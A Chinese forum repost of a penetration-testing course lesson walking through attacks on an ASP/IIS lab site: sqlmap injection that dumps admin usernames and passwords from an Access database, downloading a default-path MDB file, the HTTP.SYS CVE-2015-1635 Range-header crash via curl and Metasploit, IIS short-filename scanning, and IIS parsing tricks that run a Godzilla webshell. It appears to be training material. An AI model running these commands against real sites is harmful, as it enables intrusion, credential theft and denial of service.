尚未崩坏 发表于 2024-6-13 20:57:27

第41天:WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库走漏

第四十一天

https://img-blog.csdnimg.cn/img_convert/a6cb5ed86ade0f353190a4bfbe7c319c.png
一、ASP-SQL注入-Access数据库

1.解释

ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一样平常接纳字典猜解表和列再获取数据,猜解简朴但又可能出现猜解不到的情况,由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。

[*] mdb后缀就是access数据库的文件
[*] 数据库路径不去更改的就是默认路径,是写在配置文件里面的
python sqlmap.py -u "" --tables //获取表名
python sqlmap.py -u "" --cloumns -T admin //获取admin表名下的列名
python sqlmap.py -u "" --dump -C "" -T admin //获取表名下的列名数据
2.漏洞扫描

通过注入得到网站的用户名和密码之后想要知道网站后台的登岸地址有如下方法

[*]目录扫描——字典去跑
[*]IIS短文件——使用漏洞探针
[*]网站爬虫——获取架构中的目录和文件路径分析
二、ASP-默认安装-数据库走漏下载

1.ASP漏洞原因


[*]由于大部分ASP步调与ACCESS数据库搭建,但ACCESS无需连接,都在脚本文件中定义配置好数据库路径即用,不必要额外配置安装数据库,所以大部分提前固定好的数据库路径如默认未修改,当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击
[*]access类型数据库并未启动MySQL,所以该网站的数据库是放在源码目录下的,而且在搭建时没有更改数据库位置,那么默认是什么就是什么
三、ASP-IIS-CVE&短文件&解析&写入

1.HTTP.SYS(CVE-2015-1635)

1.漏洞描述

远程实行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 哀求时会导致此漏洞。 成功使用此漏洞的攻击者可以在体系帐户的上下文中实行任意代码。
2.影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
3.漏洞使用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
4.漏洞复现

msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts xx.xx.xx.xx
set rport xx
run
2.IIS短文件

1.漏洞描述

此漏洞现实是由HTTP哀求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的紧张文件,并获取有关应用步调底子布局的信息。
2.漏洞成因:

为了兼容16位MS-DOS步调,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用下令dir /x
3.应用场景:

后台路径获取,数据库文件获取,其他敏感文件获取等
4.使用工具:

https://github.com/irsdl/IIS-ShortName-Scanner
https://github.com/lijiejie/IIS_shortname_Scanner
3.IIS文件解析

1.漏洞成因

IIS 6 解析漏洞

[*] 该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析
[*] 该版本默认会将*.asp/目录下的所有文件当成Asp解析
[*] 如:logo.asp;.jpg xx.asp/logo.jpg
IIS 7.x 解析漏洞

[*] 在一个文件路径(/xx.jpg)背面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
[*] 应用场景:配合文件上传获取Webshell
4.IIS写权限

IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
参考使用:https://cloud.tencent.com/developer/article/2050105
四、情况复现

1.ASP-默认安装-MDB数据库走漏下载

1.初次打开必要将IP更改为自己的才能打开

https://img-blog.csdnimg.cn/img_convert/1950a1b848252ea3aa67a9d6a0589183.png
2.输入url更改路径下载数据库文件

https://img-blog.csdnimg.cn/img_convert/5db8ab90dd11880ea52be0d8d42b420b.png
3.打开下载的数据库文件查看账号密码

https://img-blog.csdnimg.cn/img_convert/2b0742d467b9b3944571a4591451759a.png
https://img-blog.csdnimg.cn/img_convert/129dcbca62563f84a0e6a39b85ebc137.png
4.根据源码打开网站后台进行登岸实行

https://img-blog.csdnimg.cn/img_convert/166545853c75e628c6fb13be47f52479.png
5.假如想不被直接下载,就要更改数据库文件名,同时在配置文件也必要进行更改(include/conn.asp、conn.asp)

https://img-blog.csdnimg.cn/img_convert/dc21869758894fadfbd53130c9b445c7.png
https://img-blog.csdnimg.cn/img_convert/6b085ba131cbe4b44e0f5cf84c88310f.png
2.ASP-中心件-CVE&短文件&解析&写权限

1.HTTP.SYS

1.打开演示情况使用ipconfig下令查看本机IP,进入浏览器输入IP查看IIS版本

https://img-blog.csdnimg.cn/img_convert/56c5bf26e361b09f4de96e2fac56a97f.png
2.漏洞证明

curl -v IP -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"
3.使用metasploit进行测试

use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts
show options
run
https://img-blog.csdnimg.cn/img_convert/799bf5d341ec35ac39ec537a0a2738e8.png
4.Win7蓝屏

https://img-blog.csdnimg.cn/img_convert/eddc5768d70851efe18bc9f3f7618a84.png
2.IIS-短文件

1.打开目标网站

https://img-blog.csdnimg.cn/img_convert/50b809412bd8cb1bd3f4b2616fb6f7e2.png
2.使用工具IIS_shortname_Scanner-master进行漏洞复现

python iis_shortname_scan.py http://192.168.163.133:88/
https://img-blog.csdnimg.cn/img_convert/8adc3dc0b7cd21975219b747e45bb319.png
3.IIS-文件解析

1.使用哥斯拉生成asp格式的木马

https://img-blog.csdnimg.cn/img_convert/ed428e7868226ad662997ea5024d1c4f.png
2.将生成的木马放到IIS目录下

https://img-blog.csdnimg.cn/img_convert/c3168b015244b813f02f78b2d59ce7e8.png
3.使用哥斯拉进行连接

https://img-blog.csdnimg.cn/img_convert/ba4ce25087021a7982816e393d17a61a.png
4.更改文件名,实行重新进行连接

https://img-blog.csdnimg.cn/img_convert/75e8503238735ef9ca558a7fe3857951.png
5.连接成功

https://img-blog.csdnimg.cn/img_convert/885902e2c798cc325c9f031d597d5bc4.png
5.创建1.asp文件夹,将后门asp文件放入

https://img-blog.csdnimg.cn/img_convert/80ce5dc9e948bda260adcf60d289bd66.png
6.使用哥斯拉实行重新进行连接

https://img-blog.csdnimg.cn/img_convert/3e8bacdb89eb8ab48578d373a1d2901e.png
3.ASP-SQL注入-SQLMAP使用&ACCESS注入

1.使用下令进行SQL注入对表名进行暴力破解

python .\sqlmap.py -u "http://192.168.163.133:89/Pic.asp?classid=3"
--tables
2.判断有注入点

https://img-blog.csdnimg.cn/img_convert/c594d14aca2a563b6cb775996b97b0a4.png
3.提示是否使用字典进行爆破

https://img-blog.csdnimg.cn/img_convert/97eef57c54db16e9cc23bebe7ef3375d.png
4.扫到admin表就可以停息进行后续渗出了

https://img-blog.csdnimg.cn/img_convert/064c94a45357441c4862b4635eb0168e.png
5.根据access数据库布局进行列名爆破

python .\sqlmap.py -u "http://192.168.163.133:89/Pic.asp?classid=3" --columns -T admin
columns:列名
T:表的缩写
admin:刚刚爆破出来的admin表
https://img-blog.csdnimg.cn/img_convert/8a7931eac1086a11c42300b0d107eeef.png
https://img-blog.csdnimg.cn/img_convert/301640aa2f680810e67b2dd29a5af68e.png
6.得到username列、ID列、password列

https://img-blog.csdnimg.cn/img_convert/f1dbb2f686f5b6a4de7e69291833f708.png
7.得到列名就去爆数据内容

sqlmap -u "http://192.168.163.133:89/Pic.asp?classid=3" --dump -C "username,password" -T admin
dump:数据内容
C:代表列名的名字指向缩写
“username,password”:刚刚爆出来的列名
T:表的缩写
https://img-blog.csdnimg.cn/img_convert/0d44ff685fa0ad82c246bbe1bfaa55ae.png
8.得到数据之后进行解密

https://img-blog.csdnimg.cn/img_convert/7a21353e28b8b1b753cd6fea19b3fe6f.png
https://img-blog.csdnimg.cn/img_convert/2fd173a73eb9d6b554e59c5e77b29d03.png
9.使用刚刚将到的爆6位文件名对网站目录进行扫描进行猜解后台目录名

https://img-blog.csdnimg.cn/img_convert/c155438d19459d090bcf2899e04b26cd.png
10.看到upfile料想upfile.asp,成功进入后台

https://img-blog.csdnimg.cn/img_convert/e76264e43c12a2138f53bae17b0baa79.png
11.使用目录爆破工具扫描得到网站后台地址

https://img-blog.csdnimg.cn/img_convert/61ef7e7a87197bcf264866b097c29b4b.png
https://img-blog.csdnimg.cn/img_convert/29ff3f5d429c22d7c17b52f619b225c8.png
12.输入账号密码成功进入后台

https://img-blog.csdnimg.cn/img_convert/f9c38fb2eb1105decc0721095d4648b2.png
13.使用网站爬虫的方法对网站所有可以点击的页面进行扫描,结果得到了后台登岸位置

https://img-blog.csdnimg.cn/img_convert/1283691201ecddfdd960df67062bd621.png
https://img-blog.csdnimg.cn/img_convert/10ef6c0816bc5579476b614bc3f6c7d4.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 第41天:WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库走漏